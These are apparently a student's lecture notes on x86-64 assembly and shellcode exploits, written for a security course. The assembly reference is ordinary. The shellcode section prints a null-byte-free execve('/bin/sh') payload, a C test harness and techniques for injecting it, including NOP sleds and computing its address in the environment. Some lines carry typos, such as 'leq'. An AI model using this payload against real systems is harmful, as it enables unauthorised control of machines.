Lecture 6: assembly, shellcode exploits

Assembly

We use x86 assembly, in AT&T notation (personal note: Intel is better for use though).

operand order: source, destination (Intel has the opposite)
symbol prefixes used (Intel doesn’t have those)
# for comments (Intel uses ;)
mnemonic suffix specifies operand size: b for byte, w for word (16 bits), l for long (32 bits), q for quad (64 bits) (Intel doesn’t do this)
- optional if one of operands is register

Low-level, processor-specific symbolic language, directly translated to machine code.

Intructions: simple operations like mov %rax, %rbx (copies value from register rax to register rbx)

form: mnemonic source, destination (mnemonic is short code telling CPU what to do)
number and type of operands depends on instruction, may be implicit
operand types:
- register: %rax, %rsp, or %al
  - memory locations on CPU
  - types:
    - general purpose (to some extent): %rax, %rbx, %rcx, %rdx, %rsi, %rdi, %r8-%r15
    - stack pointer: %rsp
    - frame/base pointer: %rbp
    - flags register
    - instruction pointer: %rip
    - segment registers: %cs, %ds, %es, `%fs, etc.
    - system registers, model specific registers
    - instruction set registers
  - default register is 64-bit, can use smaller parts: %eax (32-bit), %ax (16-bit), %ah (8 high bits of %ax), %al (low 8 bits of %ax)
- memory: 0x401000, 8(%rbp), (%rdx, %rcx, 4)
  - max one explicit memory operand allowed
  - accessed by dereferencing pointers
  - specified as offset(base, index, scale)
    - computes and derefs offset+base+index*scale
    - base, index: 64-bit registers
      - if %rip, symbolic displacement is relative to next instruction
    - offset: 32-bit constant or symbol, default 0
    - scale: 1, 2, 4, or 8 (default 1)
    - all parts optional
- constants/immediates: prefixed with $ (e.g. $42)

Directives: commands for assembler

.data: section with variables
.text: section with code
.byte/.word/.long/.quad: integer (8/16/32/64 bits)
.ascii/.asciz: outputs string (without/with null terminator)

labels: create symbol at current address (foo: .byte 42 is similar to global char foo = 42) comments: prefixed with #

Endianness: when storing an integer in memory, which byte is stored first

little end: least significant byte first (used by Intel)
big end: most significant byte first

Signed integers:

Intel stores signed ints in 2’s complement (most significant bit is made negative)
to flip sign, flip all bits and add 1
most operations identical between signed/unsigned, except:
- comparisons need different condition code
- different instructions for mul/div
to cast integer to larger size - size extension (most significant bit copied into all new bits)

Common instructions:

example	meaning
mov src, dst	dst = src
xchg dst1, dst2	swap dst1 and dst2
push src	store src on top of stack
pop dst	remove value from top of stack and store in dst
add src, dst	dst += src
sub src, dst	dst -= src
inc dst	dst += 1
dec dst	dst -= 1
neg dst	dst = -dst
cmp src1, src2	set flags based on src2-src1
and src, dst	dst &= src
or src, dst	dst \|= src
xor src, dst	dst ^= src
not dst	dst = ~dst
test src1, src2	set flags based on src1 & src2
jmp addr	jump to addr
call addr	push return address, call function addr
ret	pop return address, return there
syscall	enter kernel to perform system call (based on registers)
lea src, dst	dst = &src (src must be in memory)
nop	do nothing

Conditional branching instructions (prepend ‘n’ to condition for opposite, e.g. jne)

example	meaning
je addr; jz addr	jump if result == 0
jb addr	jump if dst < src (unsigned)
ja addr	jump if dst > src (unsigned)
jl addr	jump if dst < src (signed)
jg addr	jump if dst > src (signed)
js addr	jump if result < 0 (signed)

Stack:

top of stack identified by stack pointer %rsp
entries on stack always 64 bits
push and pop implicitly store/load %rsp
stack grows downwards (push decrements %rsp by 8, pop increments %rsp by 8)
call and ret push/pop return address
function sets up stack frame in prologue, restores caller’s stack frame in epilogue (but note: this depends on calling convention)
small parameters stored in registers (%rdi, %rsi, %rdx, %rcx, %r8, %r9), other parameters on stack right-to-left (but note: this depends on calling convention)
function prologue:
1. push %rbp
2. set %rbp to %rsp
3. push callee-saved registers (%r12-%r15)
4. decrement %rsp to make space for local vars
5. save parameters t5.o local variables if needed
function epilogue:
1. save return value (if any) in %rax
2. set %rsp to %rbp
3. pop callee-saved registers
4. pop %rbp
5. return to caller (uses top-of-stack as return address)

Shellcode

Assume we:

found vulnerability that allows overwriting return address
crafted input to trigger vulnerability

Where do we point return address?

code that’s already in program
code that we inject into the program

x86 CPUs don’t distinguish code and data, so if memory permissions allow:

we can read/write program code as data
we can execute data as program code

How do we inject code into program?

specify as parameter
specify as environment variable
provide as input (if input stored in buffer)

Injected code must:

work regardless of where it’s stored in memory
not depend on external code like libraries
not contain any NULL bytes (would terminate if stored as string)
do something that gives attacker control of system

User code can’t start program, kernel does that. So tell kernel to do something using a syscall:

special instruction to switch to kernel
based on params stored in registers or memory, kernel performs required task
kernel returns to our program

Starting a shell:

need execve system call to start program (the shell)
want to call execve("/bin/sh", argv, NULL), where char argv[] = { "/bin/sh", NULL}
how without shared libraries (libc)?
- %rax register stores which system call to invoke, 0x3b is execve
- syscall switch to kernel, result is stored in %rax after return
- retq return to caller
so shellcode requirements are:
- string “/bin/sh” in memory
- array in memory, with pointer to “/bin/sh” and NULL pointer
- pointer to string in %rdi (program name)
- pointer to array in %rsi (argv)
- NULL pointer in %rdx (envp)

Shellcode:

.data
.globl shellcode
shellcode:
    jmp code_start
string_addr:
    .ascii "/bin/shNAAAAAAAABBBBBBBB"
code_start:
    leq string_addr(%rip), %rdi     # load the string into %rdi ('path' in execve), offset is negative to avoid null bytes
    xorl %eax, %eax                 # clear %rax without using null bytes
    movb %al, 0x07(%rdi)            # replace "N" in string with null, use %rax to avoid explicit null
    movq %rdi, 0x08(%rdi)           # move program name to argv[0] in execve
    movq %rax, 0x10(%rdi)           # move null to argv[1] in execve, use %rax to avoid explicit null
    leaq 0x08(%rdi), %rsi           # load address of argv into %rsi
    movq %rax, %rdx                 # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
    movb $0x3b, %al                 # load syscall number into %rax, 0x3b is execve, we already xored %rax so other bytes are zero
    syscall                         # perform call 0x3b(%rdi, %rsi, %rdx)
    .byte 0

Testing shellcode:

#include <stdio.h>
int main(int argc, char **argv) {
    extern char shellcode;
    void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
    f();
    fprintf(stderr, "this shouldn't print\n");
    return -1;
}

Injecting the shellcode:

assume injection in env
- injection in command line argument is similar
- injection in input data is harder, but can use similar techniques (create and analyze program similar to vulnerable program)
- one solution is NOP sled: when jumping anywhere in sequence of NOPs, end up at next instruction behind it
if we specify shellcode as env variable, we can compute its address (bottom_of_stack-8-(strlen(progname)+1)-(strlen(shellcode)+1))

Computer and Network Security

Table of Contents

Lecture 6: assembly, shellcode exploits

Assembly

Shellcode